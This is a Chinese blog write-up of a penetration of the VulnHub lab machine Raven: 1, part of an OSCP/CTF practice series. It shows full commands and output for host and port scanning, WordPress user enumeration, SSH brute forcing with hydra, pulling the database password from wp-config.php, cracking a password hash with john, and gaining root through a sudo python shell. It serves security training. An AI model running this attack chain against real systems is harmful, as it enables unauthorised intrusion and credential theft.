本文主要记录对 Raven: 1 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com
博客集:面向 CTF 的 OSCP 破解系列
下载链接:Raven: 1
OSCP - Raven: 1 的破解
2019年4月14日10:58:06【原创】
1. 官方描述
Name: Raven: 1
名字:Raven: 1
Date release: 14 Aug 2018
发布日期:2018-8-14
Description: Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking.
描述:适合初学者,存在四个 flag,有两种方式可以获得 root 权限。设置虚拟机为 NAT 网络模式
2. Workthrough
首先使用 netdiscover 发现IP
root@kali:~# netdiscover -r 10.10.10.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.10.10.1 00:50:56:c0:00:08 1 60 VMware, Inc.
10.10.10.2 00:50:56:fb:16:b2 1 60 VMware, Inc.
10.10.10.79 00:0c:29:dc:29:fc 1 60 VMware, Inc.
10.10.10.254 00:50:56:e0:63:df 1 60 VMware, Inc.
获知IP为 10.10.10.79 ,下面探测端口
root@kali:~# nmap -Pn -p- 10.10.10.79
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 07:03 EDT
Nmap scan report for 10.10.10.79
Host is up (0.00063s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
52632/tcp open unknown
MAC Address: 00:0C:29:DC:29:FC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
看到有 80 端口,使用浏览器访问,发现页面做的非常用心,尝试在页面源代码中发现flag
终于在service 中发现了一个flag
flag1{b9bbcb33e11b80be759c4e844862482d}
使用 dirb 进行目录爆破
root@kali:~# dirb http://10.10.10.79
START_TIME: Sun Apr 14 07:07:14 2019
URL_BASE: http://10.10.10.79/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.79/ ----
==> DIRECTORY: http://10.10.10.79/css/
==> DIRECTORY: http://10.10.10.79/fonts/
==> DIRECTORY: http://10.10.10.79/img/
+ http://10.10.10.79/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://10.10.10.79/js/
==> DIRECTORY: http://10.10.10.79/manual/
+ http://10.10.10.79/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://10.10.10.79/vendor/
==> DIRECTORY: http://10.10.10.79/wordpress/
发现存在 CMS wordpress,下面使用 wpscan 进行扫描
root@kali:~# wpscan --url http://10.10.10.79/wordpress --wp-content-dir -ep -et -eu
[+] Enumerating usernames ...
[+] We identified the following 2 users:
+----+---------+---------------+
| ID | Login | Name |
+----+---------+---------------+
| 1 | michael | michae |
| 2 | steven | Steven Seagul |
+----+---------+---------------+
[+] Finished: Sat Apr 13 23:31:31 2019
[+] Elapsed time: 00:00:09
[+] Requests made: 1065
[+] Memory used: 25.695 MB
通过枚举发现存在密码,暴力猜解账号密码
root@kali:/usr/share/wordlists# gzip -d rockyou.txt.gz
root@kali:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.79
Hydra (http://www.thc.org/thc-hydra) starting at 2019-04-14 00:03:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:0), ~14344399 tries per task
[DATA] attacking ssh://10.10.10.79:22/
[22][ssh] host: 10.10.10.79 login: michael password: michael
[STATUS] 14344655.00 tries/min, 14344655 tries in 00:00h, 0 to do in 01:00h, 14344148 active
探测出密码 并尝试登录
[22][ssh] host: 10.10.10.79 login: michael password: michael
root@kali:~# ssh michael@10.10.10.79
michael@10.10.10.79's password:
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$ cd /var/www/
michael@Raven:/var/www$ ls
flag2.txt html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
michael@Raven:/var/www$
此处获得 flag2的值
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
内核版本还挺高,内核提权估计是不行了
由于此处是一个 cms ,所以去寻找数据库的账号密码,通常在config目录中
michael@Raven:/var/www/html/wordpress$ vi wp-config.php
// ** MySQL settings - You can get this info from your web host ** //^M
/** The name of the database for WordPress */^M
define('DB_NAME', 'wordpress');^M
^M
/** MySQL database username */^M
define('DB_USER', 'root');^M
^M
/** MySQL database password */^M
define('DB_PASSWORD', 'R@v3nSecurity');^M
^M
/** MySQL hostname */^M
define('DB_HOST', 'localhost');^M
^M
/** Database Charset to use in creating database tables. */^M
define('DB_CHARSET', 'utf8mb4');^M
^M
/** The Database Collate type. Don't change this if in doubt. */^M
define('DB_COLLATE', '');^M
数据库用户名:root
密码为:R@v3nSecurity
拿到密码之后登录数据库
michael@Raven:/var/www/html/wordpress$ mysql -u root -p
mysql> show databses;
mysql> use wordpress;
mysql> show tables;
遍历数据库中的内容,查看有效信息,发现 flag3 和 flag4 都隐藏在 wp_posts 中
mysql> select * from wp_posts;
mysql> select * from wp_posts;
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| ID | post_author | post_date | post_date_gmt | post_content | post_title | post_excerpt | post_status | comment_status | ping_status | post_password | post_name | to_ping | pinged | post_modified | post_modified_gmt | post_content_filtered | post_parent | guid | menu_order | post_type | post_mime_type | comment_count |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
| 1 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | Welcome to WordPress. This is your first post. Edit or delete it, then start writing! | Hello world! | | publish | open | open | | hello-world | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?p=1 | 0 | post | | 1 |
| 2 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:
<blockquote>Hi there! I'm a miner by day, aspiring actor by night, and this is my website. I live in Kalgoorlie, have a great dog named Red, and I like yabbies. (And gettin' a tan.)</blockquote>
...or something like this:
<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>
As a new WordPress user, you should go to <a href="http://192.168.206.131/wordpress/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun! | Sample Page | | publish | closed | open | | sample-page | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?page_id=2 | 0 | page | | 0 |
| 4 | 1 | 2018-08-13 01:48:31 | 0000-00-00 00:00:00 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | draft | open | open | | | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 0 | http://raven.local/wordpress/?p=4 | 0 | post | | 0 |
| 5 | 1 | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | flag4{715dea6c055b9fe3337544932f2941ce} | flag4 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | | 4 | http://raven.local/wordpress/index.php/2018/08/12/4-revision-v1/ | 0 | revision | | 0 |
| 7 | 2 | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 4 | http://raven.local/wordpress/index.php/2018/08/13/4-revision-v1/ | 0 | revision | | 0 |
+----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+
5 rows in set (0.00 sec)
至此 四个 flag 已经全部拿到。但是我们还没有拿到 root 权限
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
获取hash值之后需要暴力破解,由于已经知道一个账号密码了,下面破解 steven
root@kali:~# cat hashs.txt
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
root@kali:~# john hashs.txt
pink84 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# john -show hashs.txt
?:pink84
得到密码为 pink84,用户名 steven,登录
root@kali:~# ssh steven@10.10.10.79
steven@10.10.10.79's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 14:33:53 2019 from 10.10.10.69
$
查询用户创建的相关文件无果
find / -user steven -type f 2>& 1 | grep -v "Permission" | grep -v "No such" | grep -v "proc"
查询 sudo 权限
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
发现 python 可以无密码获取最高权限,执行命令
$ sudo python -c 'import pty; pty.spawn("/bin/bash")'
root@Raven:/home/steven#
root@Raven:/home/steven# id
uid=0(root) gid=0(root) groups=0(root)
通常在 /rooot 目录中都会有一个 flag,去看看吧
root@Raven:/home/steven# cd /root/
root@Raven:~# ls
flag4.txt
root@Raven:~# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
果然,有一个 falg4
flag4{715dea6c055b9fe3337544932f2941ce}
771
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
